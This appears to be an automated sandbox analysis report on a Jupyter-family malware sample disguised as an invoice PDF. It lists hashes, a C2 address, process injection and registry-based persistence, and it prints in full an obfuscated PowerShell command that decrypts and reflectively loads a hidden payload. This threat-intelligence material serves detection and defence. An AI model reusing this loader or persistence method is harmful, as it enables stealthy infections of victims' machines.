Analysis
max time kernel: 152s
max time network: 158s
platform: windows7_x64
resource: win7-20240221-en
resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
submitted: 17/04/2024, 00:04
Static task: static1
Behavioral task: behavioral1
Sample: Tools-Invoice.pdf.exe
Resource: win7-20240221-en
General
Target: Tools-Invoice.pdf.exe
Size: 272.0MB
MD5: 19ec298f977fdc71f195a4782fa8b156
SHA1: 4a6035ce7510a7cc02bb785244e2cfcaec89131d
SHA256: 32b42c8c10ce7ec03005931d079fe7bb7f0e5b36bcf57a789081c6f7787e630c
SHA512: d8cd8e043c24998d41b06ed0de8a8628389dab04be583094e68f5660ccc666dc260367297d373c800869fe36878aa8730fe35c2eb0b1e6631c0c2fec338b2391
SSDEEP: 49152:Uj+t6IRUEFX1PVv3Gfbs8HuQq1nvHol6Kz3DfjkJO:Uj+tNtV/AAFBH9yzLt
Malware Config (Extracted)
Family: jupyter
http://146.70.71.174
Signatures

Drops startup file (1 IoC)
  File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IGkyfEbUaMfoDlfVRjFNGDzVu.ppYERxDIBNXzrxpfvEsgVIFHvZOUVc (Tools-Invoice.pdf.exe)

Executes dropped EXE (1 IoC)
  PID 1716: TvtuziedoTs.exe

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

Modifies registry class (7 IoCs)
  Key created: \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\azuihrtvmuiivbsmfcs\shell\open (Tools-Invoice.pdf.exe)
  Set value (str): \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\azuihrtvmuiivbsmfcs\shell\open\command\ = "powershell -windowstyle hidden -command \"$AC=New-Object System.Security.Cryptography.AesCryptoServiceProvider;$AC.Key=[Convert]::FromBase64String('4tlPZeU/u3NIcXTiv65iMu84tVLO8U2c+xIHrjnZmxo=');$EB=[Convert]::FromBase64String([IO.File]::ReadAllText([System.Text.Encoding]::Utf8.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcQWRtaW5cQXBwRGF0YVxSb2FtaW5nXE1pY3Jvc29mdFxXaW5kb3dzXFN0YXJ0IE1lbnVcUHJvZ3JhbXNcU3RhcnR1cFxJR2t5ZkViVWFNZm9EbGZWUmpGTkdEelZ1LnBwWUVSeERJQk5YenJ4cGZ2RXNnVklGSHZaT1VWYw=='))));$AC.IV = $EB[0..15];$Decryptor=$AC.CreateDecryptor();$UB=$Decryptor.TransformFinalBlock($EB, 16, $EB.Length-16);$AC.Dispose();[Reflection.Assembly]::Load($UB);[rt8wjQPEtmlcqs2iZrKuC47aQbTVEoFCYALe76hrb9pjqI8TnDQI_jjI0fyLqYCg.F5YiBpBH3_z]::QcCj8u48mNjtGnV7OG0X1ZnL892XAoU7zbmgVpCcAaUUbOZCUGvAYET2YXVRYaeFftCcN();\"" (Tools-Invoice.pdf.exe)
  Key created: \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\.ppyerxdibnxzrxpfvesgvifhvzouvc (Tools-Invoice.pdf.exe)
  Set value (str): \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\.ppyerxdibnxzrxpfvesgvifhvzouvc\ = "azuihrtvmuiivbsmfcs" (Tools-Invoice.pdf.exe)
  Key created: \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\azuihrtvmuiivbsmfcs\shell\open\command (Tools-Invoice.pdf.exe)
  Key created: \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\azuihrtvmuiivbsmfcs (Tools-Invoice.pdf.exe)
  Key created: \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\azuihrtvmuiivbsmfcs\shell (Tools-Invoice.pdf.exe)

Suspicious use of AdjustPrivilegeToken (1 IoC)
  Token: SeDebugPrivilege, PID 2624, Tools-Invoice.pdf.exe

Suspicious use of FindShellTrayWindow (64 IoCs)
  PID 1716: TvtuziedoTs.exe (64 identical entries)

Suspicious use of WriteProcessMemory (7 IoCs)
  PID 2000 (Tools-Invoice.pdf.exe) wrote to memory of PID 1716, procid_target 28 (4 entries)
  PID 2000 (Tools-Invoice.pdf.exe) wrote to memory of PID 2624, procid_target 29 (3 entries)
Processes

1. C:\Users\Admin\AppData\Local\Temp\Tools-Invoice.pdf.exe
   Command line: "C:\Users\Admin\AppData\Local\Temp\Tools-Invoice.pdf.exe"
   PID: 2000
   - Suspicious use of WriteProcessMemory

   2. C:\Users\Admin\AppData\Local\Temp\TvtuziedoTs.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\TvtuziedoTs.exe"
      PID: 1716
      - Executes dropped EXE
      - Suspicious use of FindShellTrayWindow

   2. C:\Users\Admin\AppData\Local\Temp\Tools-Invoice.pdf.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\Tools-Invoice.pdf.exe" /s
      PID: 2624
      - Drops startup file
      - Modifies registry class
      - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 997KB
MD5: dbc534854dd385e59a3f1906ddfb9020
SHA1: 2b3062d82232ce10a8713829199769ff0d12e0fc
SHA256: 06486febb76aaa7bf469ba1bf46a92c4eafc42a5626646184e8865c862d09dd0
SHA512: 1506fbc8fca0a3ca06e24fdae2fb9e8cb345fd6197f5cbbaa990490cc20a25b72906ab9668725f29c0bfce6528bd7dca5dc15ca0ac3c0327d1876e58e3d47951